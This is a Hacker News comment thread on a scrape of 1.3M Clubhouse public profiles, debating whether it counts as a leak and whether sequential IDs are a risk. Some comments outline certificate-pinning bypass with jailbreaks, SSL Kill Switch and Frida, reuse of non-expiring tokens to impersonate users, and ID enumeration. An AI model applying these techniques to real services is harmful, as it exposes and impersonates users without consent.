Hacker News new | past | comments | ask | show | jobs | submit login
Clubhouse data leak: 1.3M user records leaked online for free (cybernews.com)
306 points by 0xmohit on April 11, 2021 | hide | past | favorite | 82 comments



I reported this to Clubhouse in February, no response whatsoever (I am not involved in this leak, just to be extra clear). Essentially anyone with the token from the iOS app (MITMproxy + SSL kill switch) can query through the entire public (records are cleaned) user profile database. It supports wildcard queries and just responds with some 20M records you can page through if you have the time. It luckily (!) doesn't expose e-mail and phone number, which is why I also agree with others here that this is only mildly interesting. The news won't care, however. I think at around 4M users or so they switched from auto-increasing IDs to a better numbering format, until then all records remain as-is (increasing).

I think Clubhouse can fix this quite easily (limit the records returned in search!!!) and apply some harsher rate limits on a per-token basis (tokens never expire, that's another thing).

I think they relied a bit too much on certificate pinning. Once that's bypassed, it's relatively easy to query your way through the data. If you managed to grab someone else's token (which doesn't expire), you impersonate them (without logging the other session out), and continue to show up/talk in rooms using the Agora SDK as that person.

They also do upload phone numbers of the address book in clear-text (non-hashed), although I can see that there's not too much of a point because reverse-hashes can maybe work around this easily if not salted.


I was in some of those CH convos with you. I was actually suspended for a little while and tried clearing it up with them. Sent all the details I had and the original google doc I published w/ a lot of styprs work. They never responded but I was unbanned and given some fresh invites... but yea... strange it hasn't been cleared up.

Ultimately I think the premise is around a completely open and a transparent digital experience. Clubhouse still needs to defend against those with malicious intent and a new realm of psychographics to abuse.

Side note: I was hooked on the app until that suspension (lasted ~2w)... I haven't been able to get back into a groove. I rarely log on anymore.


Reading your post, it's amazing the checkboxes of failed access control efforts:

* trying to control clients

* obfuscating IDs

* rate limiting data

...rather than the more boring yet standard approach of thinking through an access control policy and then enforcing that at the server.


> Once that's bypassed

Do you mean that you trick the app into accepting a wrong cert? How does one do that, apart from decompilation?


Jailbreaking an iPhone and using a tool like SSL Kill Switch [1] or just plain, old Frida with a script like [2] will do the job. Jailbreaking is the hard part, especially for an up to date iPhone, after that there's loads of guides you can follow that disable certificate validation for pretty much every application. It all boils down to hooking the necessary validation functions and having the APIs lie to the app code.

Some apps package their own crypto helpers (often with big crypto problems) to make this harder and require actual reverse engineering, but those are a pain to maintain and it's only a matter of time before someone finds a way around them. If you can extract the symbols (so if the app has not been obfuscated well) you can use Frida's API to hook those as well through any language you like. There's even an interactive Javascript console you can hook into the apps you're hooking!

Certificate pinning is a great way to protect users' security and privacy, especially in countries with questionable governments or ISPs, but it won't protect your app's secrets.

[1]: https://github.com/nabla-c0d3/ssl-kill-switch2 [2]: https://techblog.mediaservice.net/2020/08/ios-13-certificate...


That's exactly right. The hardest part is finding a phone that runs iOS 13+ and can be jailbroken still. I think I used an iPhone 7 or 8. If someone's really curious, it's probably even worth the $50-$100 for a used iPhone that can be jailbroken, it opens up A LOT of similar doors for investigating.


FWIW, the iPhone 12 I bought 2 weeks ago came with 14.2.1 (which has 2 jailbreaks available for it, unc0ver and Taurine)

Not sure if older iPhones would come with older versions too, I assume used ones would normally be up to date - though iPhone X and earlier are jailbreakable on all versions via checkm8


You can jailbreak any non-A14 device running 14.2.1 or lower right now by following this guide to update to 14.3 and then jailbreaking with unc0ver

https://www.reddit.com/r/jailbreak/comments/mm0g3f/news_new_...

Jailbreaking iOS 14 with checkra1n breaks faceID because it requires an additional SepOS exploit

https://checkra.in/news/2020/09/iOS-14-announcement


> Some apps package their own crypto helpers

Didn't even know that mobile OSes have APIs for cert validation, since that's not a part of the OS in my books. Though the motivation for shared libs is understandable (Facebook being an example of what not to do).

I guess one drunken evening I'm gonna read through lists of the APIs just to see what kinds of stuff are crammed there.


I'm not sure why you're surprised, Windows has come with a library for certificate validation since the late 90s. The OSX documentation library has an example of using SecureTransport all the way back to 2004, but the API is probably older. The *nix systems, with their modular nature, may be technically usable without a TLS library, but even your average RTOS comes with fully-featured TLS support built in these days.

Mobile operating systems provide a very broad API so that access management and sandboxing is made easy. I'm not sure how things are done on the iOS side, but on Android you can enable certificate pinning application-wide by just putting an XML file with the right name in the right place and adding a key/value pair for the hostname and the pinned public key (anywhere in the validation chain, AFAIK). The same XML file also allows disabling plain text requests from your application runtime, preventing accidental data leaks to insecure networks.

Because adding security is so easy, there's loads of apps enforcing a security setting that otherwise would be considered obscure to most application developers. Exposing an optional, application-wide API is a pretty solid idea in my book; I'm not aware of any Linux system API that can easily enforce certificate pinning on an application-wide level.


iOS you can use Charles app and intercept https request without any extra device.

https://www.charlesproxy.com/documentation/ios/


My understanding is that Charles (man in the middle attacks) will only work with apps that don’t use certificate pinning. If an app uses that, I’m not aware of a way around without jailbreaking.

https://www.raywenderlich.com/1484288-preventing-man-in-the-...


You usually recompile the app, or if you have a jailbroke phone - you can do it at runtime.

But considering how the API is documented now (and alternative third party apps exist), it might not even be necessary.


Nothing wrong with auto incrementing identifiers if actual security controls (authorization) are implemented for already authenticated users.


Sequential is still bad if you don’t want to disclose the size of your customer base or other commercially sensitive information.

Also see the German Tank Problem[1].

1. https://en.m.wikipedia.org/wiki/German_tank_problem


Am aware. Still don’t think it’s worth the hassle for most situations. Can leak information, but context is really important. I have rarely seen it be an issue over many years of app assessments. Just something to keep in the threat model for when it’s relevant.


There was one wireless ISP many years ago in a city I lived in that had a signal/reception page to see your signal to their closet tower. The URL included the customer number to identify your location. I quickly discovered it had no authorisation checks. You could easily find the exact addresses of all of their customers. Inactive/old customers returned no data.


What hassle is it? Where in your codebase do you assume sequentiality? It should be a one line change in your db configs to generate GUIDs instead of ids. You have to do it eventually anyway as sequentiality can't be assumed once you shard.


Depends on the needs I suppose. I don’t like starting off with GUIDs until it’s proven they are needed, because, as you say, it’s a simple change. Sharing does complicate the picture, but how many apps really need sharding.


> I don’t like starting off with GUIDs until it’s proven they are needed

For security incidents, "when they are needed" will be too late to do anything. If it's all the same to you, I'd advise that you default to GUIDs.


true, but if you do sequential for users and free trials, the information leakage can be close to zero. Think about if all those AOL CDs were sequentially numbered.


That's not zero information leakage. That's just leaking another statistic that is somewhat correlated to the one you want to hide (you're leaking the production of trial AOL CDs, and production of trial AOL CDs have some correlation to number of new users).


Don’t return indexes with user queries.


Usually you need some external unique identifier so you can interact with the object. Sure, that doesn't have to be the db index, but it is the convenient choice


Except when you want to change databases, or grow beyond a single one, or shard what you have. If you do this you’re binding your future self.


If you follow the "defense in depth" paradigm, then sequential identifiers bad when the other controls are defeated. Sequential ID make it trivial to crawl the entire dataset - which could be the difference between "Information on 4 million users was stolen" and "information from 4 users was stolen"


From [0]:

> This is misleading and false. Clubhouse has not been breached or hacked. The data referred to is all public profile information from our app, which anyone can access via the app or our API.

So just like what happened to Parler and LinkedIn. A so-called 'data breach' of its public data via scraping.

But last time I checked on the private API in a GitHub repo, Clubhouse is using integer IDs which are not random alphanumberic strings for its users.

This can essentially be scraped by a while loop, incrementing all the way to whoever last signed up.

Did Clubhouse even implement rate limiting to combat this?

[0] https://twitter.com/joinClubhouse/status/1381066324105854977


Does anyone remember the ATT "Hack"? These two just used curl to get e-mail address and ICC-ID of ATT iPad users which where publicly accessible. [1] It was still labeled a hack and went through the brain dead media that way. Instead of ATT getting in trouble Auernheimer got a 41 months sentence and the judge also ordered him and Spitler to pay $73,000 in restitution.

[1] https://www.wired.com/2013/03/att-hacker-gets-3-years/


weev had a lot of friends come forth to defend his actions, but then he went full neonazi in prison and all of that support disappeared.

He now runs admin for The Daily Stormer and somehow finds a way to keep popping up in the worst places, can't seem to shake the guy.

Additionally, he didn't even do the legwork for the AT&T op, but really wanted to take credit for something for cool hacker cred, and it came back and bit him. I keep company with several people involved in that ordeal.


If this wasn't a hack, would a SQL injection have been a hack? Where do you draw the line?

What if they had exploited the heartbleed bug, would that have been a hack?


I think this comes down to an oft-repeated discussion of what we (society) consider the "proper" securing of data.

If a company leaves data available in a manner that is accessible without using any kind of vulnerability, but rather allows the unintended (ab)use of a poorly implemented service, then that's not a "hack", that's on the company, and they should be held accountable.

Personally I think an SQL injection still falls under the above. Securing public endpoints against long-known and easily mitigated vulnerabilities is 100% the company's responsibility..

There is no "we couldn't have prevented this" bullshit defense in that case.


The company probably deserves punishment for negligence, but that should have zero impact on how we view the actions of the "hacker".

>If a company leaves data available in a manner that is accessible without using any kind of vulnerability, but rather allows the unintended (ab)use of a poorly implemented service, then that's not a "hack", that's on the company, and they should be held accountable.

Is it "theft" if you leave your keys in your car and I take it?


IMO the “car with keys inside” analogy is not great for poorly implemented infosec. The latter is both more benign (no physical property directly stolen) and at the same time worse (the scale means multitudes of people will become vulnerable to further attacks, identity theft, doxxing and so on, rather than just one person losing the means of movement). It’s just different qualitatively.

What should have impact on how we view the actions of a hacker is the context of said actions, not just the “hacking” part.

If the hacker exploited company’s infosec negligence to profit in some way (say, by selling the data), or irresponsibly disclosed the data or the vulnerability possibly causing harm to affected users, it is one thing.

Otherwise, the same sequence of hacker’s actions that exploits the vulnerability does not compare to stealing a car with keys inside—it is (another faulty analogy warning) more like looking at a car through some magical looking glass that highlights the keys left inside by the owner.


It certainly is.. but now let's go talk to your insurance company and see how they feel about covering the loss.


It's only a problem if you think it's a problem for someone to trivially build a social graph for every person on your exclusive social network with lots of high profile people.

So...it's a problem.


Not a great response on their part since the article they reference in the tweet does not say that they have been breached or hacked. Only that there's a limited dataset of users out there and that Techmeme reached out to Clubhouse to know if they are aware of any breaches of their systems.

Pretty bad optics if the other stuff is true: incremental IDs, no rate limiting, tokens that don't expire.


Correct, and judging from someone else in this thread, it was even possible to use wildcard matching to get access to an entire list of users at once.


I understand why people are saying this is not a breach and I tend to agree. I do think there are some basic measures you can put in place to make this kind of abuse harder.

The real problem is that most users don’t understand when they sign up for a service like clubhouse, what information is public, how easy it is for bad actors to get access to that information and how this information can be used to harm them later (phishing, identity theft etc.).

Who should be educating the average non technical user about the risk of agreeing to share you information publicly and even if they knew would it actually change anything.

Personally, I have hit the point where I have accepted that all my -and my families information is public and for that reason with people like my parents I tend focus on teaching them to avoid falling for phone scams and phishing.


I guess a leak requires private data to be exposed, this is just a collection of public data.


Is it public info who invited you to the Clubhouse app? If not, that would assume some kind of breach, since that info is part of the leak.


> Is it public info who invited you to the Clubhouse app?

Yes: that is public info. This is all no more a "leak" than the original service is a "leak" of itself.


Besides, the name, username, profile picture, etc are publicly accessible via permalinks

For example: https://www.joinclubhouse.com/@clubhouse


Everyone can see who invited you to Clubhouse down in the bottom of the profile.


It's not only public, it's central to the whole concept. You can always walk up your tree to see who the original member in your line is.


I agree. This "hack" is the equivalent of any search engine indexing public Facebook or LinkedIn profiles.


Same as the recent FB and Linkedin incidents. It's all scraped data. Doesn't mean that collecting public data at scale is not something bad


Which one are you referring to? The recent millions of contacts that were exposed from FB contained phone numbers. It had my phone number and it's not public.


Still just scraping. They iterated every phone number on the planet.

https://twitter.com/mikko/status/1379686946117668867


It's a fabulous resource, I've already used it to identify unknown numbers sending me messages on Signal


Is now.


Yup, wrong tense used. :(


It looks like someone just scraped all of the public profiles.


It looks more like a SQL dump to me. The data doesn't seems to be too critical however.


How so? It is exactly the data you see when you open any clubhouse profile in the app

Almost as if there was an endpoint /profiles/id that someone just scrapped by using id 0..9999999999


One of the first places I worked they had that.

For private data.

Guess their user id and you could get someones whole contact list, access their voicemail, or start a 30 person conference call which could dial out internationally with calls billed to the affected user...

The entire top management had user ids below 100...

I found the problem because on login all it set was a cookie with the userid, and so of course I tried changing it.

When I alerted my manager to the problem they put in place 'encryption' of said cookie.

It was base64 encoding.

They were shocked when I broke that too.

Writing this now it sounds invented, but it's not. To be fair this was more than 20 years ago, and a lot of developers did not yet have any understanding of security, so they at least had a shred of an excuse.

I left that company first chance I got.


> 'encryption' of said cookie...It was base64 encoding.

Made me chuckle.


I never figured out what thought process led to them considering base64 a security feature. I mean, I could tell just by looking at the cookie it was base64, but I expected that meant they'd encrypted it and then base64 encoded the result. But no. It made me treat every bit of code I was handed with extreme caution.


If I were collecting a large amount of data, I would most likely store it in a database.


Active data yes, archived data goes into the warehouse.


Yup, this seems to be the case. I don’t know how this could be characterize as a leak?


It's definitely a grey area here. Clubhouse strongly encourages using real names on their platform. That can be considered personal information that should be protected by security controls that they seem to lack, based on what others have mentioned here, that could have limited this "leak".


Perhaps we need to add a term such as "harvesting", to better distinguish between hacks/leaks and mass aggregation of public profile data.


Looks like it's a scrape of public profile information from Clubhouse.

Also it reads more like an advertisement for the author's services.

I'd like to see a more credible source.


That someone who wrote an iOS app with such a lame concept of security that anyone could dump the entire database (even if its only "public" data) in a script is not surprising, as most startups and even big companies don't give a crap about security. I've seen this way too often. If you are so cavalier about security in simple rest queries, imagine what lurks beneath not yet discovered.


This data seems to have been public and free for a while... Here: https://www.kaggle.com/johntukey/clubhouse-dataset


The generated graph is interesting. I guess everyone in the middle are early adopters and people with high numbers of followers. Then the clusters on the outer edges are people catering to a niche audience. Then those niche audiences spawn their own microcosm


As long as we are talking about “leaks”, someone at Clubhouse might want to look into being compliant with California’s Consumer Privacy Act:

https://twitter.com/wbm312/status/1360014416087945222?s=21


This is the cherry on the top for their policy that requires real names. People never learn.


They also know your birthdate and phone number. The only thing they don’t know is the name of your first pet.


These things weren’t exposed via the API.


I'm completely done with centralized social media "apps." I'm not signing up for any more and other than HN I've stopped using all of them and recommended that my friends do the same (surprisingly, many have listened.)


I feel this validates their decision to only release on iOS first. On Android there would be even fewer barriers to this kind of scraping.


I think we're watching the implosion of the cloud. Those leaks are not even illegal, yet they will lead to a lot of spam, a lot of phishing, and a lot of other clumsy actions by clumsy actors that will alienate users and make them more reluctant to give their information next time. At least, i hope we re post peak cloud and falling fast into the norm of the internet the way it was meant to be: pseudonymous


I don’t get it. This “leaked” information looks like something that would be displayed on a public website for each user. As far as I can see it’s just public information, like user names and avatars on e.g. stack overflow.


The difference is it's all in a SQL dump that any kiddo can use to spam. Ease of use matters


Do you think this additional spam will be noticeable on top of what is already there?


phone/sms spam is definitely more noticeable and actually hard to block


2021 the year of leaks ..


Not really. It seems like we have redefined what a leak is.


Hopefully this is a good omen for Julian


All of their devs must be too busy working on an Android app to fix these minor security bugs... :)


Why is this a leak? Looks like someone scraped the data any user has access to. If this is a leak, then the cybernews.com feed should be filled with linkedin/if/fb/etc leaks every minute.




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: